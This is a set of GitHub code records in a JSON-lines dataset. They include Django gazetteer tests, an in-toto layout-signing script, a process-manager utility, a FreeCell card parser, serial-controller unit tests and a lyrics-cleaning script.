response.content)\n self.assertEqual(len(locr['code']), 1, 'Response should not contain name match: ' + response.content) \n self.assertEqual(locr['code'][0]['defaultName'], \"Wollongong\")\n # self.assertEqual(locr['defaultName'], \"Wollongong\")\n # self.assertEqual(locr['defaultName'], \"Wollongong\") \n \n data = json.loads ( '''{\n \"locationType\": \"XXX\",\n \"names\": [\n {\n \"name\": \"Wollongong\",\n \"language\": \"en\"\n }\n ]\n }''' )\n\n c = AdminClient()\n response = c.post(reverse('matchloc'), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200, 'Response should be 200, with empty list')\n locr = json.loads(response.content)\n self.assertEqual(len(locr['code'])+len(locr['name_lang'])+len(locr['name']), 0, 'Response should not contain any matches: ' + response.content)\n \n def test_locationname_insert(self):\n \"\"\"\n Tests insertion of a name to a specific location .\n \"\"\"\n\n loc= Location.objects.first()\n \n c = AdminClient()\n c.login_as_admin()\n import pdb; pdb.set_trace()\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200)\n\n # test various equivalent null forms are handled\n for data in [ {\"name\":\"The Gong\",\"language\":None}, {\"name\":\"The Gong\",\"language\":''} , {\"name\":\"The Gong\"} ] :\n \n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200,'Insert name failed')\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200,'Location not retrieved after insert of name')\n locr = json.loads(response.content)\n # check only one exists, and it has no language set\n count = 0\n for n in locr['names'] :\n if n['name'] == data['name'] :\n self.assertIsNone(n.get('language'),'language value should be missing')\n count +=1\n self.assertEqual( count, 1, 'Insert of name with no language failed: incorrect count {0!s}'.format( count)) \n\n # test overiding null language, and inserting new name \n for data in [ {\"name\":\"The Gong\",\"language\":'en'}, {\"name\":\"Wollongong City\",\"language\":'fr'} , {\"name\":\"Wollongong City\",\"language\":'en'} ] :\n \n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200,'Insert name failed')\n response = c.get(reverse('getloc', args=[loc.id]))\n self.assertEqual(response.status_code, 200,'Location not retrieved after insert of name')\n locr = json.loads(response.content)\n # check only one exists, and it has no language set\n count = 0\n for n in locr['names'] :\n if n['name'] == data['name'] :\n if n['language'] == data['language'] :\n count +=1\n else :\n self.assertIsNotNone(n.get('language'),'Name with language not set should not occur after language specified for name')\n \n self.assertEqual( count, 1, 'Insert of name with no language failed: incorrect count {0!s}'.format( count)) \n \n data = {\"name\":\"732\",\"namespace\":'http://abs.gov.au/admincodes/',\"language\":''}\n response = c.post(reverse('recordname', args=[loc.id]), data=json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 200) \n\n response = c.get(reverse('getloc', args=[loc.id]))\n \n self.assertEqual(response.status_code, 200)\n locr = json.loads(response.content)\n \n # now we can test it - it shows up OK in the debugger here..\n \n# self.assertEqual(locr.names, m)\n ","repo_name":"rob-metalinkage/django-gazetteer","sub_path":"gazetteer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"34142352536","text":"from securesystemslib import interface\nfrom in_toto.models.layout import Layout, Step, Inspection\nfrom in_toto.models.metadata import Metablock\n\n\ndef main():\n # Load Alice's private key to later sign the layout\n priv_key_alice = interface.import_rsa_privatekey_from_file(\"resources/keys/alice\")\n\n # Load public keys\n pub_key_alice = interface.import_rsa_publickey_from_file(\"resources/keys/alice.pub\")\n\n\n layout = Layout.read({\n \"_type\":\n \"layout\",\n \"keys\": {\n pub_key_alice[\"keyid\"]: pub_key_alice,\n },\n \"steps\": [{\n \"name\": \"clone\",\n \"expected_products\": [[\"CREATE\", \"src/*\"]],\n \"pubkeys\": [pub_key_alice[\"keyid\"]],\n \"threshold\": 1,\n },{\n \"name\": \"code-build\",\n \"pubkeys\": [pub_key_alice[\"keyid\"]],\n \"expected_command\": ['mvn', 'clean', 'install', '-DskipTests'],\n \"expected_materials\": [[\"MATCH\", \"src/*\", \"WITH\", \"PRODUCTS\",\"FROM\", \"clone\"],[\"DISALLOW\", \"*\"]],\n \"expected_products\": [\n [\"CREATE\", \"target/SpringBootHelloWorld-0.0.1.jar\"], \n [\"CREATE\", \"target/*\"],\n [\"DISALLOW\", \"*\"],\n ],\n \"threshold\": 1,\n }\n ],\n \"inspect\": [\n {\n \"name\": \"docker-build\",\n \"expected_materials\": [\n [\"MATCH\", \"target/SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\", \"WITH\", \"PRODUCTS\", \"FROM\", \"code-build\"],\n ],\n \"expected_products\": [\n [\"MATCH\", \"./SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\", \"WITH\", \"PRODUCTS\", \"FROM\", \"code-build\"]\n ],\n \"run\": [\n \"ls\"\n# \"find\",\n# \"-type\", \n# \"f\", \n# \"-name\", \n# \"SpringBootHelloWorld-0.0.1-SNAPSHOT.jar\"\n ]\n }\n ],\n })\n\n metadata = Metablock(signed=layout)\n\n # Sign and dump layout to \"root.layout\"\n metadata.sign(priv_key_alice)\n metadata.dump(\"root.layout\")\n print('Created in-toto layout as \"root.layout\".')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SaiJyothiGudibandi/supplychain-test","sub_path":"resources/keys/create_layout.py","file_name":"create_layout.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24163213649","text":"from django import template\nfrom home_app.models import Translation\nimport re\n\nregister = template.Library()\n\n\"\"\"\nTemplate tags to define a variable and to add a number to a variable not using |add only usable \nfor a display {{toto|add}}\nused in detail_view\n\"\"\"\n\n\n@register.simple_tag(takes_context=True)\ndef dis_play(context, value):\n \"\"\"\n Template tag to display datas from translation modele\n Args :\n Context --> use to get session data\n Value --> key for the translation modele\n Return:\n Field from Translation modele --> language (FR, UK..)\n \"\"\"\n try:\n language = context.request.session['language']\n except KeyError:\n language = \"UK\"\n text_to_display = Translation.get_translation(value, language)\n return text_to_display\n\n@register.filter\ndef get_error_msg(value):\n \"\"\"\n Filter to remove all the tags of an error message to get the message\n remove also some specials chars\n Args :\n The complete error message\n Return:\n The message to be displayed\n \"\"\"\n value = str(value)\n pattern = \"
  • (.*?)
  • \"\n try:\n value = re.search(pattern, value).group(1)\n except AttributeError:\n value = re.search(pattern, value)\n value = re.sub(\"’\", ' ', value)\n return value\n","repo_name":"jmlm74/P11-Ameliorez-un-projet-existant-en-Python","sub_path":"products_app/templatetags/dis_play.py","file_name":"dis_play.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18875182061","text":"from __future__ import print_function\nimport os\nimport sys\nimport glob\nimport stat\nimport signal\nimport argparse\nimport subprocess\nimport tempfile\nimport json\nimport time\nimport re\n\n# ------------------------------------------------------------------------------\nclass ArgumentParser(argparse.ArgumentParser):\n\n # -------------------------------------------------------------------------\n def stable_config_path(self, arg):\n return os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"..\",\n \"share\",\n \"proman\",\n \"config\",\n arg\n )\n\n # -------------------------------------------------------------------------\n def site_config_path(self, arg):\n return os.path.join(\"/etc/proman\", arg)\n\n # -------------------------------------------------------------------------\n def user_config_path(self, arg):\n return os.path.join(\n os.path.expanduser(\"~\"),\n \".config\",\n \"proman\",\n arg)\n\n # -------------------------------------------------------------------------\n def config_search_paths(self, arg):\n return [\n os.path.abspath(arg),\n self.stable_config_path(arg),\n self.site_config_path(arg),\n self.user_config_path(arg)\n ]\n\n # -------------------------------------------------------------------------\n def config_search_exts(self):\n return [\".procfg\", \".json\"]\n\n # -------------------------------------------------------------------------\n def find_config_path(self, arg):\n for path in self.config_search_paths(arg):\n for ext in self.config_search_exts():\n tmp = path + ext\n if os.path.isfile(tmp):\n return tmp\n\n # -------------------------------------------------------------------------\n def config_basename(self, path):\n return os.path.splitext(os.path.basename(path))[0]\n\n # -------------------------------------------------------------------------\n def find_config_names(self):\n result = []\n for path in self.config_search_paths(os.path.curdir):\n for ext in self.config_search_exts():\n for filepath in glob.glob(os.path.join(path, \"*\"+ext)):\n yield filepath\n\n # -------------------------------------------------------------------------\n def __init__(self, **kw):\n argparse.ArgumentParser.__init__(self, **kw)\n\n def config_path(arg):\n result = self.find_config_path(arg)\n return result if result else arg\n\n self.add_argument(\n dest=\"config_paths\",\n metavar=\"config\",\n type=config_path,\n nargs='*',\n help=\"\"\"\n Specifies the path to or the name of a configuration file.\n Configuration files are read in the order specified on\n the command line. Variables in later files replace variables\n from earlier files. If config is not a valid filesystem path,\n then following paths `%(paths)s', are searched for files with\n names specified in config, with extensions: `%(exts)s'.\n Currently visible configs: `%(configs)s'.\n \"\"\" % {\n \"paths\": \"', `\".join(self.config_search_paths(\"config\")),\n \"exts\": \"', `\".join(self.config_search_exts()),\n \"configs\": \"', `\".join([self.config_basename(x) for x in self.find_config_names()])\n }\n )\n\n def key_value(arg):\n sep = '='\n tmp = arg.split(sep)\n return (tmp[0], sep.join(tmp[1:]))\n\n self.add_argument(\n \"--set\",\n dest=\"overrides\",\n metavar=\"variable=value\",\n type=key_value,\n action=\"append\",\n default=[],\n help=\"\"\"\n Specifies new values for the config variables.\n Variables from loaded configuration files are always overriden,\n by values specified on the command-line.\n \"\"\"\n )\n\n self.add_argument(\n \"--print-config\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Prints the fully loaded and merged process configuration.\"\"\"\n )\n\n self.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Does not actually start anything just prints selected information.\"\"\"\n )\n\n self.add_argument(\n \"-l\", \"--list\",\n dest=\"list_paths\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Print list of visible configuration file paths and quit.\"\"\"\n )\n\n self.add_argument(\n \"-L\", \"--list-names\",\n dest=\"list_names\",\n action=\"store_true\",\n default=False,\n help=\"\"\"Print list of visible configuration file names and quit.\"\"\"\n )\n\n # -------------------------------------------------------------------------\n def process_parsed_options(self, options):\n\n if options.list_paths:\n for path in self.find_config_names():\n print(path)\n self.exit()\n\n if options.list_names:\n for path in self.find_config_names():\n print(self.config_basename(path))\n self.exit()\n\n for config_path in options.config_paths:\n if not os.path.isfile(config_path):\n self.error(\"'%s' is not a config file name or path\" % (config_path))\n\n return options\n\n # -------------------------------------------------------------------------\n def parse_args(self):\n return self.process_parsed_options(\n argparse.ArgumentParser.parse_args(self)\n )\n\n# ------------------------------------------------------------------------------\ndef get_argument_parser():\n return ArgumentParser(\n prog=os.path.basename(__file__),\n description=\"\"\"launches and manages a group of processes\"\"\"\n )\n\n# ------------------------------------------------------------------------------\ndef merge_configs(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, {})\n merge_configs(value, node)\n elif isinstance(value, list):\n node = destination.setdefault(key, [])\n node += value\n else:\n destination[key] = value\n\n return destination\n\n# ------------------------------------------------------------------------------\nclass ExpansionRegExes(object):\n\n # -------------------------------------------------------------------------\n def _resolve_cmd_which(self, name):\n search_dirs = os.environ.get(\"PATH\", \"\").split(':')\n search_dirs += os.path.dirname(__file__)\n for dir_path in search_dirs:\n cmd_path = os.path.join(dir_path, name)\n if os.path.isfile(cmd_path):\n if stat.S_IXUSR & os.stat(cmd_path)[stat.ST_MODE]:\n return cmd_path\n return name\n\n # -------------------------------------------------------------------------\n def _resolve_cmd_wildcard(self, pattern):\n print(pattern)\n return [os.path.realpath(x) for x in glob.glob(pattern)]\n\n # -------------------------------------------------------------------------\n def _resolve_cmd_pathid(self, name):\n return int(hash(name))\n\n # -------------------------------------------------------------------------\n def __init__(self):\n self.commands = {\n \"which\": (\n re.compile(\".*(\\$\\(which (\\w*)\\)).*\"),\n lambda match : self._resolve_cmd_which(match.group(2))\n ),\n \"wildcard\": (\n re.compile(\".*(\\$\\(wildcard (.*)\\)).*\"),\n lambda match : self._resolve_cmd_wildcard(match.group(2))\n ),\n \"pathid\": (\n re.compile(\".*(\\$\\(pathid (([/]\\w*)*)\\)).*\"),\n lambda match : self._resolve_cmd_pathid(match.group(2))\n )\n }\n\n self.variable = re.compile(\".*(\\${([A-Za-z][A-Za-z_0-9]*)}).*\")\n self.list_exp = re.compile(\".*(\\$\\[([A-Za-z][A-Za-z_0-9]*)\\.\\.\\.\\]).*\")\n self.eval_exp = re.compile(\".*(\\$\\(([0-9+*/%-]*)\\)).*\")\n\n# ------------------------------------------------------------------------------\nclass ProcessConfig(object):\n\n # -------------------------------------------------------------------------\n def _fallback(self, name):\n if name in [\"SELF\"]:\n return os.path.abspath(__file__)\n\n if name in [\"BINDIR\", \"BINARY_DIR\"]:\n return os.path.dirname(__file__)\n\n if name in [\"TMPDIR\", \"TEMPDIR\"]:\n return tempfile.gettempdir()\n\n if name in [\"HOME\"]:\n return os.path.expanduser(\"~\")\n\n if name in [\"LOGDIR\"]:\n return \"/var/log\"\n\n if name in [\"DATADIR\"]:\n return \"/var/run\"\n\n if name in [\"EXEPATH\"]:\n return \"$(which ${EXENAME})\"\n\n if name in [\"EXEID\"]:\n return \"$(pathid ${EXEPATH})\"\n\n if name in [\"LOGPATH\"]:\n return \"${LOGDIR}/${EXENAME}.log\"\n\n if name in [\"LOG_SEVERITY\"]:\n return \"info\"\n\n return name\n\n\n # -------------------------------------------------------------------------\n def _do_resolve_env_vars(self, res, name, variables):\n value = str(variables.get(name, os.environ.get(name, self._fallback(name))))\n\n while True:\n found = re.match(res.variable, value)\n if found:\n prev = value[:found.start(1)]\n repl = self._do_resolve_env_vars(\n res,\n found.group(2),\n variables)\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n while True:\n found = re.match(res.eval_exp, value)\n if found:\n prev = value[:found.start(1)]\n repl = str(eval(found.group(2)))\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n while True:\n found_cmd = None\n for cmd_name, cmd_re_func in res.commands.items():\n cmd_re, cmd_func = cmd_re_func\n found = re.match(cmd_re, value)\n if found:\n found_cmd = cmd_name\n break\n\n if found_cmd:\n prev = value[:found.start(1)]\n repl = str(cmd_func(found))\n folw = value[found.end(1):]\n value = prev+repl+folw\n else: break\n\n return value\n\n # -------------------------------------------------------------------------\n def _resolve_env_vars(self, res, names, variables, info):\n tmp_env = variables.copy()\n tmp_env.update(info.get(\"variables\", {}))\n if type(names) is not list:\n names = [names]\n\n for name in names:\n value = self._do_resolve_env_vars(res, name, tmp_env)\n\n found = re.match(res.list_exp, value)\n if found:\n prev = value[:found.start(1)]\n repl = variables.get(found.group(2), [])\n folw = value[found.end(1):]\n if type(repl) is not list:\n repl = [repl]\n\n for nested_value in self._resolve_env_vars(\n res,\n [prev+name+folw for name in repl],\n tmp_env,\n info): yield nested_value\n else:\n yield value\n\n # -------------------------------------------------------------------------\n def __init__(self, options):\n self.full_config = {}\n\n if options.config_paths:\n for config_path in options.config_paths:\n implicit = {\n \"THIS_DIR\": os.path.dirname(os.path.realpath(config_path)),\n \"THIS_CFG\": os.path.splitext(os.path.basename(config_path))[0],\n \"THIS_EXT\": \"\".join(os.path.splitext(os.path.basename(config_path))[1:])\n }\n try:\n with open(config_path) as config_file:\n partial_config = json.load(config_file)\n for proc in partial_config.get(\"processes\", []):\n try:\n proc[\"variables\"].update(implicit)\n except KeyError:\n proc[\"variables\"] = implicit\n\n self.full_config = merge_configs(\n partial_config,\n self.full_config)\n except IOError as io_error:\n print(\"error reading '%s': %s\" % (config_path, io_error))\n except ValueError as value_error:\n print(\"error parsing '%s': %s\" % (config_path, value_error))\n\n for key, value in options.overrides:\n self.full_config[\"variables\"][key] = value\n\n res = ExpansionRegExes()\n\n env = self.full_config.get(\"variables\", {})\n\n resolve = lambda args, info : self._resolve_env_vars(res, args, env, info)\n\n for info in self.full_config.get(\"processes\", []):\n info[\"cmd\"] = [x for x in resolve(info[\"args\"], info)]\n\n if options.print_config:\n print(\n json.dumps(\n self.full_config,\n sort_keys=True,\n indent=2,\n separators=(', ', ': ')\n )\n )\n\n def process_infos(self):\n return self.full_config.get(\"processes\", [])\n\n# ------------------------------------------------------------------------------\nclass ProcessInfo(object):\n\n # -------------------------------------------------------------------------\n def __init__(self, info):\n self.start_attempts = 0\n self.pid = -1\n self.info = info\n self.handle = None\n self.start_time = None\n self.stop_time = None\n\n # -------------------------------------------------------------------------\n def __del__(self):\n try:\n self.terminate()\n except:\n pass\n\n # -------------------------------------------------------------------------\n def close_on_terminate(self):\n return bool(self.info.get(\"autoclose\", False))\n\n # -------------------------------------------------------------------------\n def is_running(self):\n return self.handle\n\n # -------------------------------------------------------------------------\n def reset(self):\n self.pid = -1\n self.start_time = None\n self.handle = None\n\n # -------------------------------------------------------------------------\n def start(self):\n max_restarts = 3\n try: max_restarts = self.info.get[\"max_restarts\"]\n except: pass\n\n if self.start_attempts < max_restarts:\n print(\"starting process '%(name)s': %(cmd)s\" % self.info)\n self.start_attempts += 1\n try:\n self.handle = subprocess.Popen(self.info[\"cmd\"])\n self.pid = self.handle.pid\n self.info[\"pid\"] = self.pid\n self.start_time = time.clock()\n print(\"started process '%(name)s' (%(pid)d)\" % self.info)\n return True\n except:\n print(\"failed to start process '%(name)s'\" % self.info)\n else:\n print(\"maximum number of restarts for '%(name)s' reached\" % self.info)\n\n return False\n\n # -------------------------------------------------------------------------\n def terminate(self):\n if self.handle:\n print(\"terminating process %(name)s (%(pid)d)\" % self.info)\n self.handle.terminate()\n self.reset()\n self.stop_time = time.clock()\n\n# ------------------------------------------------------------------------------\nclass ProcessList(object):\n\n # -------------------------------------------------------------------------\n def __init__(self, process_config):\n self.infos = {\n info[\"name\"]:\n ProcessInfo(info) for info in process_config.process_infos()\n }\n self.terminating = False\n self.done = False\n\n # -------------------------------------------------------------------------\n def manage(self):\n\n all_running = False\n while not all_running:\n all_running = True\n for name, process in self.infos.items():\n if not process.is_running():\n can_start = True\n for dep in process.info.get(\"depends\", []):\n dep_proc = self.infos.get(dep.get(\"name\"))\n if dep_proc:\n dep_delay = float(dep.get(\"delay\", 0))\n if dep_proc.start_time is None:\n can_start = False\n elif dep_proc.start_time + dep_delay > time.clock():\n can_start = False\n\n if can_start:\n if not process.start():\n return False\n else:\n all_running = False\n return True\n\n # -------------------------------------------------------------------------\n def restart(self, pid):\n for name, process in self.infos.items():\n if process.pid == pid:\n process.reset()\n if not process.close_on_terminate():\n if self.manage():\n return True\n\n return False\n\n # -------------------------------------------------------------------------\n def terminate(self):\n\n self.terminating = True\n for name, process in self.infos.items():\n if process.is_running():\n process.terminate()\n self.done = True\n\n# ------------------------------------------------------------------------------\nprocesses = None\n# ------------------------------------------------------------------------------\ndef terminate_handler(signum, frame):\n global processes\n processes = None\n\n# ------------------------------------------------------------------------------\ndef child_handler(signum, frame):\n global processes\n\n try:\n pid, signum = os.waitpid(-1, os.WNOHANG)\n if processes:\n if not processes.restart(pid):\n processes = None\n except OSError:\n pass\n\n# ------------------------------------------------------------------------------\ndef main():\n argparser = get_argument_parser()\n options = argparser.parse_args()\n config = ProcessConfig(options)\n\n global processes\n processes = ProcessList(config)\n\n signal.signal(signal.SIGINT, terminate_handler)\n signal.signal(signal.SIGTERM, terminate_handler)\n signal.signal(signal.SIGCHLD, child_handler)\n\n if not options.dry_run:\n if processes.manage():\n while processes:\n signal.pause()\n\n# ------------------------------------------------------------------------------\nif __name__ == \"__main__\": main()\n","repo_name":"matus-chochlik/various","sub_path":"python/proman.py","file_name":"proman.py","file_ext":"py","file_size_in_byte":19538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15563342898","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport click\n\n\nnum_to_class = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, '10':10, 'J':11, 'Q':12, 'K':13,\n '0':10} # 0 for abbrev.\nsuite_to_class = {'s':1, 'd':2, 'h':3, 'c':4}\n\nclass_to_num = [None, 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\nclass_to_suite = [None, 's', 'd', 'h', 'c']\n\n\ndef parse(game_path): # returns 7 rows of 8 cols\n c, n, s = defaultdict(int), defaultdict(int), defaultdict(int)\n data = []\n\n with open(game_path, 'r') as fp:\n for row in fp:\n row = row.rstrip()\n if row == '': continue\n\n items = row.split(' ')\n if len(items) not in (4, 8): continue\n cards_in_row = [(num_to_class[item[:-1]]-1, suite_to_class[item[-1]]-1) for item in items]\n\n for num, suite in cards_in_row:\n assert 0 <= num <= 12\n assert 0 <= suite <= 3\n c[num*13 + suite] += 1\n n[num] += 1\n s[suite] += 1\n\n data.append(cards_in_row)\n\n for card, occ in c.items():\n if occ >= 2:\n print(class_to_num[1+(card / 13)] + class_to_suite[1+(card % 13)], occ)\n assert len(c) == 52 and len(n) == 13 and len(s) == 4\n\n return data\n\n\ndef transpose(data): # 7x8 -> 8x7\n lines = []\n for c in range(8):\n line = []\n for r in range(7 if c < 4 else 6):\n line.append(data[r][c])\n lines.append(line)\n return lines\n\n\ndef dump_data(data):\n for row in data:\n print(' '.join(class_to_num[1+num] + class_to_suite[1+suite] for num, suite in row))\n\n\n@click.command()\n@click.argument('game-path', type=click.Path(exists=True, readable=True), default='game_8758887.teacher')\ndef main(game_path):\n data = parse(game_path)\n\n dump_data(data)\n print()\n dump_data(transpose(data))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"naoyat/solitaire-solver","sub_path":"freecell_game_loader.py","file_name":"freecell_game_loader.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19713614710","text":"\"\"\"Tests for VMX lib\"\"\"\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom serial import Serial\nfrom serial.tools.list_ports_common import ListPortInfo\nfrom stgctl.lib.vmx import VMX\n\n\n@pytest.fixture()\ndef mock_serial(mocker):\n # Create and return mock serial connection\n mock_serial = MagicMock(spec=Serial)\n mock_serial.write.return_value = None\n mock_serial.readall.return_value = b\"R\"\n mock_serial.port.return_value = \"Test Serial Device\"\n mocker.patch(\"serial.Serial\", return_value=mock_serial)\n return mock_serial\n\n\n@pytest.fixture(autouse=True)\ndef patched_list_ports_grep():\n mock_port_info = ListPortInfo(device=\"Test Serial Device\")\n with patch(\"stgctl.lib.vmx.grep_serial_ports\", return_value=[mock_port_info]):\n yield\n\n\n@pytest.fixture\ndef vmx(mock_serial, monkeypatch):\n mock_serial.readall.return_value = b\"R\"\n port = None\n with patch(\"stgctl.lib.vmx.serial.Serial\", return_value=mock_serial):\n vmx = VMX(port=port)\n mock_serial.write.reset_mock()\n return vmx\n\n\ndef test_vmx_class_with_patched_grep_serial_ports(patched_list_ports_grep, mock_serial):\n vmx = VMX(port=None)\n assert vmx._serial.port() == \"Test Serial Device\"\n\n\ndef test_isready_when_not_ready(vmx, mock_serial):\n # Configure the mock serial connection to return something other than \"R\" when verify is called\n mock_serial.readall.return_value = b\"\"\n\n # Call the isready method and assert that it returns False\n assert vmx.isready() is False\n\n\n# Define a list of method names and their expected arguments\nmethod_args_allow_chain = [\n (\"run\", b\"R\"),\n (\"clear\", b\"C\"),\n (\"origin\", b\"N\"),\n]\n\nmethod_args_immediate = [\n (\"verify\", b\"V\"),\n (\"kill\", b\"K\"),\n (\"decel\", b\"D\"),\n (\"reset\", b\"res\"),\n (\"record_posn\", b\"!\"),\n (\"posn\", b\"X\"),\n (\"posn\", b\"Y\"),\n (\"lst\", b\"lst\"),\n]\n\n\n@pytest.mark.parametrize(\n \"method_name, expected_args\", method_args_allow_chain + method_args_immediate\n)\ndef test_vmx_methods(vmx, mock_serial, method_name, expected_args):\n # Retrieve the method dynamically based on the name\n method = getattr(vmx, method_name)\n\n # Call method with now and perform assertions\n method()\n if method_name in method_args_allow_chain:\n assert str(vmx.command_que) == expected_args.decode()\n mock_serial.write.assert_not_called()\n if method_name in method_args_immediate:\n mock_serial.write.assert_called_once()\n assert mock_serial.write.return_value == expected_args\n\n\n@pytest.mark.parametrize(\"method_name, expected_args\", method_args_allow_chain)\ndef test_vmx_methods_with_now(vmx, mock_serial, method_name, expected_args):\n # Retrieve the method dynamically based on the name\n method = getattr(vmx, method_name)\n\n # Call the method without now and perform assertions\n method(now=True)\n mock_serial.write.assert_called_once_with(expected_args)\n\n\ndef test_echo_with_echo_state_true(vmx, mock_serial):\n # Call the echo method with echo_state=True\n vmx.echo(echo_state=True)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"F\")\n\n\ndef test_echo_with_echo_state_false(vmx, mock_serial):\n # Call the echo method with echo_state=False\n vmx.echo(echo_state=False)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"E\")\n\n\ndef test_move_relative(vmx, mock_serial):\n # Call the move method with relative=True\n vmx.move(now=True, idx=100, motor=1, relative=True)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"I1M100\")\n\n\ndef test_move_absolute(vmx, mock_serial):\n # Call the move method with relative=False\n vmx.move(now=True, idx=100, motor=1, relative=False)\n\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"IA1M100\")\n\n\ndef test_to_limit_positive(vmx, mock_serial):\n mock_serial.readall.return_value = b\"\"\n # Call the to_limit method with pos=True\n vmx.to_limit(now=True, motor=1, pos=True)\n # Verify that the write method of the mock serial connection is called with the expected command\n mock_serial.write.assert_called_once_with(b\"I1M0\")\n","repo_name":"bdelwood/stgctl","sub_path":"tests/test_lib_vmx.py","file_name":"test_lib_vmx.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74610073973","text":"__author__ = 'Dav-Z'\n\nimport glob\n\n# print(lyrics_file.read())\ndef clean_lyrics_file(lyrics_file, clean_file):\n clean_lines = []\n\n # Process file and clean it up\n for line in lyrics_file:\n line = line.casefold()\n # Extra Extra credit: get rid of punctuation\n # Another way to get rid of the chorus junk\n # line = line.rstrip(\"[chorus]\")\n line = line.rstrip()\n for junk_character in [\",\", \"'\", \"?\", \"!\", \".\"]:\n line = line.replace(junk_character, \"\")\n\n found_junk_line = False\n for junk_line in [\"[chorus]\", \"[chorus:]\"]:\n if junk_line in line:\n found_junk_line = True\n\n # if \"[chorus\" not in line:\n if not found_junk_line:\n if line:\n clean_file.write(line + '\\n')\n clean_lines.append(line)\n\n return clean_lines\n\n\nall_lyrics = []\n# Loop over each file, one at a time\nall_files = glob.glob(\"JayZ/*.txt\")\nprint(\"Looping over\", len(all_files), \"files\")\nfor infile in all_files:\n\n # stuff below goes here!\n lyricsf = open(infile)\n cleanf = open(infile + '.clean', 'w')\n\n curr_clean_lines = clean_lyrics_file(lyricsf, cleanf)\n all_lyrics.append(curr_clean_lines)\n\n lyricsf.close()\n cleanf.close()\n\n# if all_lyrics:\n# print(\"list is not empty!\")\nprint(\"Got\", len(all_lyrics), \"processed lyrics\")\n\n# from all_lyrics, compute line_counts that are strings\n\nline_counts = []\nlines_seen = 0\nfor lyrics in all_lyrics:\n num_lines = len(lyrics)\n line_counts.append(num_lines)\n lines_seen = lines_seen + num_lines\n\nprint(\"here are counts:\", line_counts)\nprint(\"Lines seen:\", lines_seen)\nprint(\"Direct sum:\", sum(line_counts))\n\n\n\ncounts_as_strings = [str(count) for count in line_counts]\nprint(\"Counts as strings:\", counts_as_strings)\n\n# TODO Create a dictionary from counts_as_strings for a stem-and-leaf plot, e.g.:\n# {'7': ['71', ...], '5': ['52', ...], ...}\n\n# countstr = '39'\n# prefix = countstr[:-1]\n# d = {}\n# '3' in d\n# if '3' not in d:\n# d['3'] = []\n# d['3'].append(countstr)\n\nstem_leaf_data = {}\nfor countstr in counts_as_strings:\n prefix = countstr[:-1]\n if prefix not in stem_leaf_data:\n stem_leaf_data[prefix] = []\n\n stem_leaf_data[prefix].append(countstr[-1])\n\nprint(stem_leaf_data)\n\n# We convert to ints again to get order, and back to strings to get 0-padding\nfor k in sorted(int(val) for val in stem_leaf_data):\n if k < 10:\n to_print = '0' + str(k)\n else:\n to_print = str(k)\n print(to_print, \"|\", ' '.join(stem_leaf_data[str(k)]))\n\n# Bonus challenge: also compute word count, character count\n# Number of occurrences of \"a\" and \"the\"\n\n\n\nprint(\"We're done!\")\n\n","repo_name":"davclark/2015-05-fundamentals-hiphopathy","sub_path":"print_contents.py","file_name":"print_contents.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6485469343","text":"# 9.24 解析并分析Python 源代码\n\n#9.24.1 问题\n\n# 我们想编写程序来解析Python源代码并对此进行一些分析工作\n\n# 9.24.2  解决方案\n# Python可以执行以字符串形式提供的源代码\n\nx = 42\neval('2+3*4 + x')\n# exec('for i in range(10):print(i)')\n# 我们可以使用ast模块将Python源代码编译为一个抽象语法树(AST)这样可以分析源代码\n\n\nimport ast\n\nex = ast.parse('2+3*4 +x',mode='eval')\nprint(ex)\nprint(ast.dump(ex))","repo_name":"mojoru2023/Recoding_Python","sub_path":"Python_Cook(练习)/9.元编程/file.24.py","file_name":"file.24.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22414347302","text":"from dataclasses import dataclass\nimport abc\nimport 